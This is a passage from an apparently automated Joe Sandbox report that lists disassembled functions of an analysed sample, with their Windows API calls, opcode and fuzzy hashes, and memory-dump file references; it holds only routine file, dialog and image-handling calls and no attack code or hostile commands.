                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 90da5cf80e174da834a3b5e89537e995e3712fa66f8e3b175c13a1073bd1b911
                                                              • Instruction ID: 20374e37d6396a103b3ad84d8ce0eccd58551e2ec43b8afab37768f8dff31a50
                                                              • Opcode Fuzzy Hash: 90da5cf80e174da834a3b5e89537e995e3712fa66f8e3b175c13a1073bd1b911
                                                              • Instruction Fuzzy Hash: F8E06D3110D234AAEE212A769D01BAA36999F427F4F1A6120BC04B62A1DAE4DC2182E0
                                                              Function 00E85960 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID:
                                                              • API String ID: 176396367-0
                                                              • Opcode ID: 6461d7e699e14e90cc700b1d000fabc94daae1be8b5a206dfd0e6fb8e739b47e
                                                              • Instruction ID: 2a3259111b87c22203d89ac612f104d5feec25c8fc8141f6cd97f79eec2168b7
                                                              • Opcode Fuzzy Hash: 6461d7e699e14e90cc700b1d000fabc94daae1be8b5a206dfd0e6fb8e739b47e
                                                              • Instruction Fuzzy Hash: 3EE0D8726102507CD66172296C01FE79BEC8FAAB74F14502FF1ADF61C1DAD0548583B2
                                                              Function 00E829CB Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00E82AF9: FindFirstFileW.KERNEL32(?,?), ref: 00E82B22
                                                                • Part of subcall function 00E82AF9: FindFirstFileW.KERNEL32(?,?,?,?,00000800), ref: 00E82B50
                                                                • Part of subcall function 00E82AF9: GetLastError.KERNEL32(?,?,00000800), ref: 00E82B5C
                                                              • FindClose.KERNEL32(00000000), ref: 00E829F6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                              • String ID:
                                                              • API String ID: 1464966427-0
                                                              • Opcode ID: 165053e6e2d16e152c56e8684735ecedaf9c6a18cd3a2f7239dba87ccd1f44ec
                                                              • Instruction ID: 08a2a54d3ed6e0fbf124b4b560e20b7ed99bcdd9e3fd615ee1cee984214ff533
                                                              • Opcode Fuzzy Hash: 165053e6e2d16e152c56e8684735ecedaf9c6a18cd3a2f7239dba87ccd1f44ec
                                                              • Instruction Fuzzy Hash: 05F05E75008790AECA2677B44804BCBBBD0AF1A321F10AA8EF2FD32192C27550999722
                                                              Function 00E8E0A6 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00E8E0AB
                                                                • Part of subcall function 00E81E20: CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000), ref: 00E81E9F
                                                                • Part of subcall function 00E81E20: GetLastError.KERNEL32 ref: 00E81EAC
                                                                • Part of subcall function 00E81E20: CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800), ref: 00E81EE2
                                                                • Part of subcall function 00E81E20: GetLastError.KERNEL32 ref: 00E81EEA
                                                                • Part of subcall function 00E81E20: SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000), ref: 00E81F39
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CreateErrorLast$H_prologTime
                                                              • String ID:
                                                              • API String ID: 3517926197-0
                                                              • Opcode ID: 8b16c4c8691d105ac0a3ddd94d3ffcc8b1b6152b8d2ed1b8e63f7220b5eb01e3
                                                              • Instruction ID: ad35e01e34502d3a6f087d0b786e7bed1dc4d915031a0113bbba7ab2d76d7873
                                                              • Opcode Fuzzy Hash: 8b16c4c8691d105ac0a3ddd94d3ffcc8b1b6152b8d2ed1b8e63f7220b5eb01e3
                                                              • Instruction Fuzzy Hash: 0CF0F871900189ABCF14FB60C992BDDB3A9AB10304F0054D5B69AB6191DBB89B85CB10
                                                              Function 00E8F846 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GdipAlloc.GDIPLUS(00000010), ref: 00E8F84C
                                                                • Part of subcall function 00E8F5D9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E8F5FA
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                              • String ID:
                                                              • API String ID: 1915507550-0
                                                              • Opcode ID: 3f5da4e93c1756c5f20b091966d0805785d91aec211097b7481f8b6ebaa856d2
                                                              • Instruction ID: c279cfd1ac0a98589cd6fc1877ef1cbb06d135857821de88226e6b8bf25d43a1
                                                              • Opcode Fuzzy Hash: 3f5da4e93c1756c5f20b091966d0805785d91aec211097b7481f8b6ebaa856d2
                                                              • Instruction Fuzzy Hash: E2D0A930300208BADF463B32AC029AE7AD8AB00340F00A231F85EA5180EEB0CE10A3A0
                                                              Function 00E92D49 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00E878B7), ref: 00E92D6E
                                                                • Part of subcall function 00E905A8: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E905B9
                                                                • Part of subcall function 00E905A8: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E905CA
                                                                • Part of subcall function 00E905A8: IsDialogMessageW.USER32(00020482,?), ref: 00E905DE
                                                                • Part of subcall function 00E905A8: TranslateMessage.USER32(?), ref: 00E905EC
                                                                • Part of subcall function 00E905A8: DispatchMessageW.USER32(?), ref: 00E905F6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                              • String ID:
                                                              • API String ID: 897784432-0
                                                              • Opcode ID: a631ab256000d205f6322e34ecc3af0320ac926a53b3dff58e9c211e368119ed
                                                              • Instruction ID: 7335bfd9b707fc675888a4cea636af02ad04606b4c67dde42222667b71a10500
                                                              • Opcode Fuzzy Hash: a631ab256000d205f6322e34ecc3af0320ac926a53b3dff58e9c211e368119ed
                                                              • Instruction Fuzzy Hash: 83D09E32144200BEDB122B52DE07F1A7AE2BB88B04F804554B388380F1C6A29D319B05
                                                              Function 00E857BE Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: d91e8cf50d68e3c3bc1e3f6785d5762b8dd3a78c84f47cf6f64c6752051a4ec0
                                                              • Instruction ID: 763eb1a575c6af60a99c753dc53e93d0fcf7c20cf33ffe98c9f97447909f79c1
                                                              • Opcode Fuzzy Hash: d91e8cf50d68e3c3bc1e3f6785d5762b8dd3a78c84f47cf6f64c6752051a4ec0
                                                              • Instruction Fuzzy Hash: D0D0C971410611CFE3619F39E444741BBE0AF08314B11882ED0C9D2120E6715880CF40
                                                              Function 00E933FD Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E933D6
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 00007d6b07965a8d159266a2041df5f8aea55bc49bf7a47ecc65a2d396bb0cc7
                                                              • Instruction ID: e97270833ffff901e02fd5ed19d65a10dabbc6a5261575cd75ddfd7321b76050
                                                              • Opcode Fuzzy Hash: 00007d6b07965a8d159266a2041df5f8aea55bc49bf7a47ecc65a2d396bb0cc7
                                                              • Instruction Fuzzy Hash: 51B012C22D92497D350491A69D03D7701FCC0C0B113B0742BB800F0282D8503E044031
                                                              Function 00E933F3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E933D6
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 7c4d896c42b48bc6e8784b74f596451278122721f37895d3c8add73830fdd005
                                                              • Instruction ID: 0e068a34abe39e9b06fee0f1ac7c824259fee82fd057c8f026bf937f8fdf941f
                                                              • Opcode Fuzzy Hash: 7c4d896c42b48bc6e8784b74f596451278122721f37895d3c8add73830fdd005
                                                              • Instruction Fuzzy Hash: 3BB012C52D92457D3604D1E69D03CF701ECC0C0B113B0752BBC00F0282D8503D480031
                                                              Function 00E934AB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E93484
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 658feef5239d5dbe25c82a62424f39c145cbf05ffdc0adfde59c296afd32e102
                                                              • Instruction ID: 63031d14f12f1e17f228c182b0a968374a6be68794979fd574fabc66b8f9ca1c
                                                              • Opcode Fuzzy Hash: 658feef5239d5dbe25c82a62424f39c145cbf05ffdc0adfde59c296afd32e102
                                                              • Instruction Fuzzy Hash: BAB012D52D8145BD394651A59C03CB701ECC0C4B103B0B11BB841F0181D5406E040031
                                                              Function 00E934A1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E93484
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 48b78cdc0966fcf14d0bbcadfff88d98906b147de55d1611dc6fba4805a75476
                                                              • Instruction ID: 050167279855a0e4ef82270eafb4a62f853a4b54949b3d66805cbecaa524f32a
                                                              • Opcode Fuzzy Hash: 48b78cdc0966fcf14d0bbcadfff88d98906b147de55d1611dc6fba4805a75476
                                                              • Instruction Fuzzy Hash: 7DB012C52D85457D760651A59C03D7B01FCC0C4B103B0B51BB545F0181D4406E080031
                                                              Function 00E9348D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E93484
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: e6d360195eac5a8653c2e2bd3f53e5ed76b72b3ecf33eb1a308dbb8a072ade01
                                                              • Instruction ID: 548d2101e42f77c8635db30c00813c26fbf6661a6c1a566875bb2b4c3700fa2f
                                                              • Opcode Fuzzy Hash: e6d360195eac5a8653c2e2bd3f53e5ed76b72b3ecf33eb1a308dbb8a072ade01
                                                              • Instruction Fuzzy Hash: 98B012C52D86857D370691A5AC03CF701ECC0C4B103B0B21BBD41F0181D4406D4C0031
                                                              Function 00E93497 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E93484
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 79aa081d71e078643513d01fab82d3769d486cedc4d86c452349895aaf2e4d45
                                                              • Instruction ID: b62dce4bd51316870e96b1b5b3bc954e4055294a40e759c95871be2bdbd18da5
                                                              • Opcode Fuzzy Hash: 79aa081d71e078643513d01fab82d3769d486cedc4d86c452349895aaf2e4d45
                                                              • Instruction Fuzzy Hash: 04B012C52D85457D370651A59D03CB711ECC0C4B203B0F11BB641F0281D4406D0D0031
                                                              Function 00E93472 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E93484
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 0e545e5502589f90324b74ae5527b15c64c4f5d2ea70ca2c217db20f924cad15
                                                              • Instruction ID: 9022e6e2fb336e2a3fc989c348f28b4163e1f14b8425daa63c6f3e3a26c5efaa
                                                              • Opcode Fuzzy Hash: 0e545e5502589f90324b74ae5527b15c64c4f5d2ea70ca2c217db20f924cad15
                                                              • Instruction Fuzzy Hash: EFB012C52D83457D360621B1BD43C7711ACC0C0B203B0F11BB641F018395406D051031
                                                              Function 00E93425 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E933D6
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
